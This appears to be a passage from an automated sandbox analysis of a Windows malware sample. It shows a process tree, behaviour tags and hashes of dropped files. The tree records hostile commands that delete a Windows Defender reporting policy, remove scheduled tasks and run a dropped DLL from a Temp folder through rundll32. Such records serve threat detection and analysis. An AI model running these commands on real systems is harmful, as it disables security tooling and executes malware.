C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2920
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GVFFxSkoOBQmaesjx"3⤵PID:3052
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll",#1 /VKsite_idBSU 5254032⤵PID:1988
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll",#1 /VKsite_idBSU 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2012 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jFAecgscnrJhBwrRF"4⤵PID:2660
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1544
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2496
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e4ac974612956d6059225dd3d6b585e4
SHA1cc1dd0d21f8b3d50fbf73c7332bb1bdea87c9631
SHA256621d43e195fdbe0f83a3dc997ebdafd011a3d6532985f13d623e91351563ba33
SHA51273c720e4e27b5e376dc3ad2c6ae5e17866dbad4071e273bcc0e284e06f297d4ee2d61c3b44c9c3751ad672add9f7ffe29e83bff6b43e09fb4b60fc40c99288f6
-
Filesize
2KB
MD56246cc28c87c69866338e855e3839a5e
SHA136f335e64ef26809595455fcf5153873ecb70d1c
SHA256ccce0caeb5a49e4a16dce01ffb07c9b6ce77517a47cce64e9eda2ebebbc5180c
SHA5122de49474c39edeb3feeaed5d083ff70133f5489ed03fc1307ed404e0ff70662d74e955e04c420b4a4daece05589e61f24ef31aedea6a88fe99d92e12e8d5f684
-
Filesize
2KB
MD582f524ddd62c7bff831f25131d29c308
SHA1434319026ae107e114bc862a7cc158254a00211d
SHA2560541667b0e9c9101d69e4cea0b57cd1774e02192d46d834eccc8a21378f3e632
SHA5129a55c5be6e211988742a65ecdfcd705f87c254f1bc388e7dea5e37ad3c8e02b6a1d46c0ca2daea1009f3cb311d5351abc75158ec441a104765caa72c4def6e5c
-
Filesize
2KB
MD5a37a8394d00066b87d81a9423e341351
SHA1da3266c93a6c4203c5cfca5711954a0a295d581a
SHA25685d08c05cb2ae51921a70ff6757d926ea2273d0777b58304cdc5e028f79c04b8
SHA512ee68107fcdeaf218ae5c5498fe8d551ae90ef72dd98eb7881ac7fc8359789df85fdd0469086b7dda0243c2fa365bb87080a1e3185b44cd24f152afbc29dfcae1
-
Filesize
1.2MB
MD58f7526ff0361a6faec57589bed39b08d
SHA1e3a50b89ff55562f171c6de99e66e47108093bb3
SHA2565bdb0ecbcd7ffd70f1b0794feb49f284613dcfcf873cdaf12f6c7ea8d5ec7518
SHA512168c2e0f11d56e9b77fbf8764e2dc96d1c33335063b4f43965dc644e66494c187f3c988366f4c6d4dc531bc8056c70e02f2b1f635252c38e5b82c5c65148b529
-
Filesize
2KB
MD514dc2e1f51ff7484657785d0bf1013a4
SHA156da370ee86a22af1bfa26825bef9e93a17de8fd
SHA25693a36e0b775b58a8ca049649c0904bc2910b77c3115539f1bfce0fc9511bce62
SHA5123b134d1cf746c1423f3e945872764b434c4f1e6e94c8021a36788112ff6eea11f96eb6d4536035f2175e44c8dd99ac221cf2aa3fa1e4be1ca3c4cafe03a8065e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5e36e5b216a99a1fbd74bcfae371202cf
SHA1a1937bad86b6e3da467410b45a6aa8c431a04a3b
SHA2564e115b6f3c6b0de572221cb74a563e8af453240b009d48c92b4bbae8da4ac966
SHA512ac2650db849915451f4b407be5121bfe8ed4764b74cd7beb4dbe03a8ea30219ef36cf16a388121738459ffd1d1949408ad3bf77401b880f1a62a698d13b16b11
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5baaf31747e7460e33021610cb8927eea
SHA1a90b45129e69a830b118d599c7d1f6bfaf37e72e
SHA2568b8230e633ab5073bb9729edcaa584addfdb7c05f3021dc8bbee29d9011956f7
SHA5126cd04632649451ba6acd0a2466c88f0b216559ab31cc488a9317f18718f5d323f0bd5c4b073a066434698fa6289466fa3f47e88f71d01f31faa90fd1aad624fc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b70e93c6c7112baec107b41a503e927f
SHA15d949a93575d4645c9ee4a8b198c95a244a286b4
SHA2567226c76efc7031b0e38e611653a8d9b7015ca262f93d2aeedf32f6bd45eb6b2f
SHA5126ddeb0367a94ca43121de74ba8e836c4102176c6c69a6288df1b93808ec3e745942ca16b9de025a60d1817fd35378d6429062ef23d71f8b7c44ef6915c8ed07f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f0b9e129c8ff8ce5ec68a8e8e1e790c1
SHA1cf1d83e2f02d18564af40490215f94c4dcafc24a
SHA25670935ab0841a24dfa3e96de45c7f1f52600529f4ad976249467f8079620490c8
SHA51289e9f3b30445861d8e246341d468dc20a0fea97b8b4f111373db0442cf90bbcea5bfef3ff8889671325ed796b17745177fdedb3dcb80458261e7ef7e63af832e
-
Filesize
7KB
MD5a0193bc2d236696558f5b00a22fc4faa
SHA13e86f76cbd953d3189d452e1ae1b8db9a0adcac7
SHA256666e3f71bf5cd9c167c36c6903f6dd8602a9bf251f4b69eff48799c97de47c6a
SHA5129e2d3da3155f408f4a83729ca2c91e9b0afa6068740e9a88fabda778567997758b8d1ff122af6c42dd4a5a7e50805283dff4636c082ac2f251d689b9aabe8611
-
Filesize
9KB
MD56c805470ab4014ac1394001e581b5b60
SHA1a8e127326bfd1bb1292e4785da56ba0c4b1e759c
SHA256c5cb0504bb5406bcc397211db7e2414809f03a6b220515f8af8e80e7a6995d82
SHA51261e83a2b19ccdf89ffd77b20eb109f09de4b5e24c32ef6153724ef938d27be6bfa0262b00d68eda08f3924bc9281c45959b840e53143443ebdbaecf4d34c66bb
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
5KB
MD5bbe7828cb907b8e58c9880955e58c568
SHA1c7725f70c03b04abedbb0e4fc1f0d4a8c10c0ef5
SHA25669ea559287281afd21a44f2fa4368e72f6fbfe3af309a92aae014992a9226f6d
SHA5120e9e1d2cff0bf9d15c39d93556ad9a0749a6e922442fb0325c999ef73e4af10df045363d9e44706e17172ef0965ad6b95e64eb4f7d176e17a286ec91a7fbe079
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.1MB
MD594e9f9491be9aa9266961628a3a620ec
SHA17d990a01bae08d6daaed48f2f8663ddceb99bf46
SHA25647431df1d7089e7c2eb37b61325adc933d17c40a5f47f518b9b673c090cb0146
SHA5126e808c9f240910133686a085bf1f97fe2cc2ff24232be89f29030d91fe58d0e2a8145f4a4d57dd2c065a1278bfebc84aec5b575fc16bd8c6a5ac0b02483e168e
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.9MB
MD50209c363d4e036a99793f4c18ed2fed7
SHA1931307059f6929d729d257cb5ff4071d33b41bc4
SHA25633c9dfcf4e6899c831fee22e8ad94d21b546f25c7bc259fd2b8870b7375f0416
SHA512d551eeaf8e7d048789a3bbb7bf6bf23cd8d641c5a2d58bf195d07b031f17bc29bba9a96f1dfd6be064494751167c00242c30b755764e5ad41d59e84e1e2b0084
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2
-
Filesize
6.1MB
MD55f8611328ffdebf9d4177cc8cbb83a9d
SHA19683a3878ee5be40a7a80a4880cc970975436778
SHA2569288f6636859552b22dacad5d37f3beb641aed7e9c3b854ac50638719ff33136
SHA512ba4194ab3814b887b717c58362d7bebd1289f0f182064895528b8c0c9af0bdf8ce0d5145d2c284271936fe5072e491321fda9d6ae0443b48622435f0bc6fc3c2